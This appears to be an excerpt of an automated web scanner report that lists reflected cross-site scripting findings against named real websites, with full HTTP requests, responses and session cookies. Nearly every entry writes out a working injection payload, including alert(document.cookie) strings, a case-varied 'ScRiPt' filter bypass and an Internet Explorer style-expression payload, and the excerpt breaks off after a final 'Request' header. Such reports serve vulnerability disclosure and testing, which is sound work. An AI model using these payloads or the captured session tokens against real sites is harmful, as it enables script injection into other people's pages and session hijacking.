_urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542
Response
HTTP/1.0 404 Not Found Vary: Accept-Encoding Date: Mon, 31 Jan 2011 21:55:01 GMT Server: LiteSpeed Connection: close X-Powered-By: PHP/5.2.9 X-Pingback: http://thefastertimes.com/xmlrpc.php Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 31 Jan 2011 21:55:01 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profi ...[SNIP]... <input type="hidden" name="redirect_to" value="/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffmanacc0c\"><script>alert(1)</script>36af2f7b086/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20 ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c7fd"><script>alert(1)</script>11e110c29ff was submitted in the REST URL parameter 7. This input was echoed as 7c7fd\"><script>alert(1)</script>11e110c29ff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%207c7fd"><script>alert(1)</script>11e110c29ff/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1 Host: thefastertimes.com Proxy-Connection: keep-alive Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542
Response
HTTP/1.0 404 Not Found Vary: Accept-Encoding Date: Mon, 31 Jan 2011 22:01:02 GMT Server: LiteSpeed Connection: close X-Powered-By: PHP/5.2.9 X-Pingback: http://thefastertimes.com/xmlrpc.php Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 31 Jan 2011 22:01:02 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profi ...[SNIP]... ut type="hidden" name="redirect_to" value="/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%207c7fd\"><script>alert(1)</script>11e110c29ff/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable% ...[SNIP]...
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ca9a"><script>alert(1)</script>61ce310421e was submitted in the REST URL parameter 8. This input was echoed as 7ca9a\"><script>alert(1)</script>61ce310421e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C7ca9a"><script>alert(1)</script>61ce310421e/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1 Host: thefastertimes.com Proxy-Connection: keep-alive Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542
Response
HTTP/1.0 404 Not Found Vary: Accept-Encoding Date: Mon, 31 Jan 2011 22:04:19 GMT Server: LiteSpeed Connection: close X-Powered-By: PHP/5.2.9 X-Pingback: http://thefastertimes.com/xmlrpc.php Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 31 Jan 2011 22:04:19 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profi ...[SNIP]... ="redirect_to" value="/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C7ca9a\"><script>alert(1)</script>61ce310421e/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefaster ...[SNIP]...
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11c5a"><script>alert(1)</script>c3fd7bce4e6 was submitted in the REST URL parameter 9. This input was echoed as 11c5a\"><script>alert(1)</script>c3fd7bce4e6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:11c5a"><script>alert(1)</script>c3fd7bce4e6/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1 Host: thefastertimes.com Proxy-Connection: keep-alive Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542
Response
HTTP/1.0 404 Not Found Vary: Accept-Encoding Date: Mon, 31 Jan 2011 22:05:51 GMT Server: LiteSpeed Connection: close X-Powered-By: PHP/5.2.9 X-Pingback: http://thefastertimes.com/xmlrpc.php Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 31 Jan 2011 22:05:51 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profi ...[SNIP]... media30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:11c5a\"><script>alert(1)</script>c3fd7bce4e6/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama ...[SNIP]...
1.105. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33748"><script>alert(1)</script>a961dd91ba7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 33748\"><script>alert(1)</script>a961dd91ba7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg?33748"><script>alert(1)</script>a961dd91ba7=1 HTTP/1.1 Host: thefastertimes.com Proxy-Connection: keep-alive Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542
Response
HTTP/1.0 404 Not Found Vary: Accept-Encoding Date: Mon, 31 Jan 2011 21:36:26 GMT Server: LiteSpeed Connection: close X-Powered-By: PHP/5.2.9 X-Pingback: http://thefastertimes.com/xmlrpc.php Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 31 Jan 2011 21:36:26 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profi ...[SNIP]... 01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg?33748\"><script>alert(1)</script>a961dd91ba7=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d7f2"><ScRiPt>alert(1)</ScRiPt>5db40f41346 was submitted in the REST URL parameter 1. This input was echoed as 3d7f2\"><ScRiPt>alert(1)</ScRiPt>5db40f41346 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /3d7f2"><ScRiPt>alert(1)</ScRiPt>5db40f41346/plugins/g-lock-double-opt-in-manager/js/glock2.min.js HTTP/1.1 Host: thefastertimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMDAxMzEwMCA6IDMgTTBhSjpvKzIyMG4gIDIxbjE%3D--412cad7633dbe777e841f2348764ef1fb7404c5d%7C29a20f8a34e3d1dc0bdf48916623bd44; __utmc=57436015; __qca=P0-2030699969-1296504545420; __utmb=57436015.2.10.1296504542;
Response
HTTP/1.0 404 Not Found Date: Mon, 31 Jan 2011 20:46:31 GMT Server: LiteSpeed Connection: close X-Powered-By: PHP/5.2.9 Vary: Cookie X-Pingback: http://thefastertimes.com/xmlrpc.php Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 31 Jan 2011 20:46:13 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profi ...[SNIP]... <input type="hidden" name="redirect_to" value="/3d7f2\"><ScRiPt>alert(1)</ScRiPt>5db40f41346/plugins/g-lock-double-opt-in-manager/js/glock2.min.js" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbac8"><script>alert(1)</script>30cb21dd885 was submitted in the REST URL parameter 1. This input was echoed as fbac8\"><script>alert(1)</script>30cb21dd885 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /fbac8"><script>alert(1)</script>30cb21dd885 HTTP/1.1 Host: thefastertimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMDAxMzEwMCA6IDMgTTBhSjpvKzIyMG4gIDIxbjE%3D--412cad7633dbe777e841f2348764ef1fb7404c5d%7C29a20f8a34e3d1dc0bdf48916623bd44; __utmc=57436015; __qca=P0-2030699969-1296504545420; __utmb=57436015.2.10.1296504542;
Response
HTTP/1.0 404 Not Found Date: Mon, 31 Jan 2011 21:34:25 GMT Server: LiteSpeed Connection: close X-Powered-By: PHP/5.2.9 Vary: Cookie X-Pingback: http://thefastertimes.com/xmlrpc.php Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 31 Jan 2011 21:34:22 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profi ...[SNIP]... <input type="hidden" name="redirect_to" value="/fbac8\"><script>alert(1)</script>30cb21dd885" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17312"><script>alert(1)</script>06c1b17e735 was submitted in the REST URL parameter 1. This input was echoed as 17312\"><script>alert(1)</script>06c1b17e735 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xmlrpc.php17312"><script>alert(1)</script>06c1b17e735 HTTP/1.1 Host: thefastertimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMDAxMzEwMCA6IDMgTTBhSjpvKzIyMG4gIDIxbjE%3D--412cad7633dbe777e841f2348764ef1fb7404c5d%7C29a20f8a34e3d1dc0bdf48916623bd44; __utmc=57436015; __qca=P0-2030699969-1296504545420; __utmb=57436015.2.10.1296504542;
Response
HTTP/1.0 404 Not Found Date: Mon, 31 Jan 2011 21:13:48 GMT Server: LiteSpeed Connection: close X-Powered-By: PHP/5.2.9 X-Pingback: http://thefastertimes.com/xmlrpc.php Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 31 Jan 2011 21:13:48 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profi ...[SNIP]... <input type="hidden" name="redirect_to" value="/xmlrpc.php17312\"><script>alert(1)</script>06c1b17e735" /> ...[SNIP]...
1.109. http://whitepapers.scmagazineuk.com/email_this_page.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://whitepapers.scmagazineuk.com
Path:
/email_this_page.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d03b"><script>alert(1)</script>38ca3e6e881 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 773d9"><script>alert(1)</script>c4735f62d83 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the limit request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89e38"><script>alert(1)</script>ea34dcb2694 was submitted in the limit parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?option=com_categoryreport&task=viewlist&sort=pdate&id=191&limit=89e38"><script>alert(1)</script>ea34dcb2694&limitstart= HTTP/1.1 Host: whitepapers.scmagazineuk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_pers=%20s_chn_cvp%3D%255B%255B%2527direct%252520load%2527%252C%25271296491520239%2527%255D%255D%7C1454257920239%3B%20s_key_cvp%3D%255B%255B%2527n/a%2527%252C%25271296491520241%2527%255D%255D%7C1454257920241%3B; s_sess=%20s_camp_dedupe%3DDirect%2520Loadn/a%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=190090989.1296493450.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); d13795d30c26c1f7270bfa31f0d2069c=505085e11891041f927d712ba3211529; PHPSESSID=v1dnuvd3enfpm1v8f1nrrifeg0; __utma=190090989.1492737905.1296493450.1296493450.1296493450.1; __utmc=190090989; __utmb=190090989.16.10.1296493450; __qca=P0-1355715055-1296491544254;
Response
HTTP/1.0 200 OK Date: Mon, 31 Jan 2011 18:15:15 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/5.2.16 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Last-Modified: Mon, 31 Jan 2011 18:15:20 GMT Cache-Control: post-check=0, pre-check=0 P3P: CP="ALL DSP NID CUR OUR STP STA" Connection: close Content-Type: text/html; charset=ISO-8859-1
The value of the sort request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5982c"style%3d"x%3aexpression(alert(1))"e1cc1d8eefc was submitted in the sort parameter. This input was echoed as 5982c"style="x:expression(alert(1))"e1cc1d8eefc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /index.php?option=com_categoryreport&task=viewlist&sort=pdate5982c"style%3d"x%3aexpression(alert(1))"e1cc1d8eefc&id=191&limit=&limitstart= HTTP/1.1 Host: whitepapers.scmagazineuk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_pers=%20s_chn_cvp%3D%255B%255B%2527direct%252520load%2527%252C%25271296491520239%2527%255D%255D%7C1454257920239%3B%20s_key_cvp%3D%255B%255B%2527n/a%2527%252C%25271296491520241%2527%255D%255D%7C1454257920241%3B; s_sess=%20s_camp_dedupe%3DDirect%2520Loadn/a%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=190090989.1296493450.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); d13795d30c26c1f7270bfa31f0d2069c=505085e11891041f927d712ba3211529; PHPSESSID=v1dnuvd3enfpm1v8f1nrrifeg0; __utma=190090989.1492737905.1296493450.1296493450.1296493450.1; __utmc=190090989; __utmb=190090989.16.10.1296493450; __qca=P0-1355715055-1296491544254;
Response
HTTP/1.0 200 OK Date: Mon, 31 Jan 2011 18:15:08 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/5.2.16 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Last-Modified: Mon, 31 Jan 2011 18:15:11 GMT Cache-Control: post-check=0, pre-check=0 P3P: CP="ALL DSP NID CUR OUR STP STA" Connection: close Content-Type: text/html; charset=ISO-8859-1
The value of the uid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24cb6"><script>alert(1)</script>78300d896e1 was submitted in the uid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
